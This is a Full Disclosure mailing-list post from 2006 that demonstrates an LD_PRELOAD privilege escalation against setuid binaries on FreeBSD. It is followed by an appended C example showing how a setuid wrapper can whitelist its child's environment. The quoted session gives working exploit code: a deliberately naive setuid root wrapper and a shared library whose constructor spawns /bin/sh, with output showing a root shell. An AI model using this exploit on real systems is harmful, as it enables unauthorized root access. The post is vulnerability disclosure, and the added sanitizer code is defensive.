Full Disclosure mailing list archives
Re: Lack of environment sanitization in the FreeBSD, OpenBSD, NetBSD dynamic loaders.
From: "Tyop?" <tyoptyop () gmail com>
Date: Wed, 22 Nov 2006 23:04:12 +0100
On 11/22/06, Tyop? <tyoptyop () gmail com> wrote:
> On 11/22/06, In Cognito <defend.the.world () gmail com> wrote:
> > Impact: Serious. May lead to privilege escalation.
> >
> > A class of security vulnerabilities has resurfaced in the dynamic loaders
> > of FreeBSD, OpenBSD, and NetBSD in the sanitization of environment
> > variables for suid and sgid binaries. Due to either badly implemented
> > sanitization or a lack of it, a setuid binary may execute other processes
> > with a tainted environment.
> >
> > [...]
> >
> > Have fun! Stay safe!
>
> Fun. Not "perfectly" safe.
>
> My experience:
>
> % id
> uid=0(root) gid=0(wheel) groups=0(wheel), 5(operator)
> % cat vuln.c
> #include <unistd.h>
>
> /* Deliberately naive set-uid root wrapper: execs a child with the
>  * caller's environment untouched. */
> int main(void)
> {
>     setuid(0);
>     execl("/usr/bin/id", "id", (char *)NULL);
>     return 1;
> }
> % cc vuln.c -o vuln && chmod 4711 ./vuln
> % exit
> % id
> uid=1001(tyop) gid=1001(tyop) groups=1001(tyop)
> % ls -l vuln
> -rws--x--x  1 root  tyop  4827 Nov 22 22:46 vuln
> % cat tyop.c
> #include <stdio.h>
> #include <unistd.h>
>
> /* Runs when the library is loaded, before the host program's main;
>  * spawns a shell with an empty environment. */
> __attribute__((constructor)) static void init(void)
> {
>     printf("[+] Hello from shared library land\n");
>     execle("/bin/sh", "sh", (char *)NULL, (char *const *)NULL);
> }
> % cc -shared -o lib.so tyop.c
> % setenv LD_PRELOAD "/home/tyop/test/lib.so"
> % ./vuln
> [+] Hello from shared library land
> # id
> uid=0(root) gid=0(wheel) egid=1001(tyop) groups=1001(tyop)
> # echo "It works on `uname -sr`"
> It works on FreeBSD 7.0-CURRENT-200609
> #
>
> Have a nice day.

# echo "It works with vuln static too"
It works with vuln static too.

(sorry for double post)

--
Tyop?

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
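The session above shows the program-side half of the problem: vuln.c hands its child whatever environment the caller supplied, so even where the loader strips LD_PRELOAD for the set-uid process itself, the variable reaches the child. The following is an added example, not code from the post or from any of the BSD loaders, of what a privileged wrapper can do about that on its own: build a whitelisted environment and exec the child with execve() instead of inheriting environ. The whitelist (a fixed PATH and IFS, pass-through of TERM and LANG only) and the sample caller environment are constructed for the example; the accessor functions exist only so the result can be inspected.

```c
/* Added example: a set-uid wrapper that execs its child with a whitelisted
 * environment. Whether the dynamic loader strips LD_* for the set-uid
 * process is the platform's job; what that process passes on to its own
 * children is the program's. The policy below is hypothetical. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define MAX_ENV 16

extern char **environ;

/* Entries the child always gets, with fixed values (hypothetical policy). */
static const char *const fixed_env[] = {
    "PATH=/bin:/usr/bin",
    "IFS= \t\n",
};

/* Names the child may inherit from the caller. Nothing loader-related
 * (LD_PRELOAD, LD_LIBRARY_PATH, ...) is ever on this list. */
static const char *const passthrough[] = { "TERM", "LANG" };

/* A value is accepted only if it carries no control characters. */
static int is_safe_value(const char *v)
{
    for (; *v != '\0'; v++)
        if ((unsigned char)*v < 0x20 || *v == 0x7f)
            return 0;
    return 1;
}

/* True if entry has the form "NAME=...". */
static int name_matches(const char *entry, const char *name)
{
    size_t n = strlen(name);
    return strncmp(entry, name, n) == 0 && entry[n] == '=';
}

/* Fill out[] (capacity max, NULL-terminated) from the caller's environment
 * in[]. Returns the number of entries, or -1 if out[] is too small. */
int build_clean_env(char *const in[], const char *out[], size_t max)
{
    size_t n = 0, i, j;
    for (i = 0; i < sizeof fixed_env / sizeof fixed_env[0]; i++) {
        if (n + 1 >= max) return -1;
        out[n++] = fixed_env[i];
    }
    for (i = 0; in != NULL && in[i] != NULL; i++)
        for (j = 0; j < sizeof passthrough / sizeof passthrough[0]; j++)
            if (name_matches(in[i], passthrough[j]) &&
                is_safe_value(in[i] + strlen(passthrough[j]) + 1)) {
                if (n + 1 >= max) return -1;
                out[n++] = in[i];
            }
    out[n] = NULL;
    return (int)n;
}

/* Does env[] still carry a loader-controlling variable? */
int has_loader_var(const char *const env[])
{
    size_t i;
    for (i = 0; env != NULL && env[i] != NULL; i++)
        if (strncmp(env[i], "LD_", 3) == 0)
            return 1;
    return 0;
}

/* Constructed sample of a caller's environment: LD_PRELOAD and PATH of the
 * caller's choosing, plus one TERM value carrying an escape character. */
static char *const sample_env[] = {
    "LD_PRELOAD=/home/tyop/test/lib.so",
    "PATH=/tmp:/bin",
    "TERM=xterm",
    "LANG=C",
    "TERM=xterm\x1b",
    NULL,
};

static const char *demo_out[MAX_ENV];
static int demo_count = -2;     /* -2: sample not sanitized yet */

static void demo_run(void)
{
    if (demo_count == -2)
        demo_count = build_clean_env(sample_env, demo_out, MAX_ENV);
}

/* Accessors for inspecting the sanitized sample. */
int demo_entry_count(void)          { demo_run(); return demo_count; }
const char *demo_entry(size_t i)    { demo_run(); return demo_out[i]; }
int demo_loader_var_leaked(void)    { demo_run(); return has_loader_var(demo_out); }
int sample_loader_var_present(void) { return has_loader_var((const char *const *)sample_env); }

/* Same shape as vuln.c, but the child never sees the caller's LD_PRELOAD. */
int main(void)
{
    const char *clean[MAX_ENV];
    char *const argv[] = { "id", NULL };

    if (build_clean_env(environ, clean, MAX_ENV) < 0) {
        fputs("environment whitelist overflow\n", stderr);
        return 1;
    }
    if (setuid(0) != 0) {       /* as in vuln.c; fails unless run as root */
        perror("setuid");
        return 1;
    }
    execve("/usr/bin/id", argv, (char *const *)clean);
    perror("execve");
    return 1;
}
```

Run against the constructed sample, the sanitizer keeps the two fixed entries plus TERM=xterm and LANG=C, and drops LD_PRELOAD, the caller's PATH and the TERM value with the escape character. The wrapper still needs the loader to behave for its own process, which is the part the advisory is about; this only closes the inheritance path into children.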
Current thread:
- Re: Lack of environment sanitization in the FreeBSD, OpenBSD, NetBSD dynamic loaders. Tyop? (Nov 22)
- Re: Lack of environment sanitization in the FreeBSD, OpenBSD, NetBSD dynamic loaders. Tyop? (Nov 22)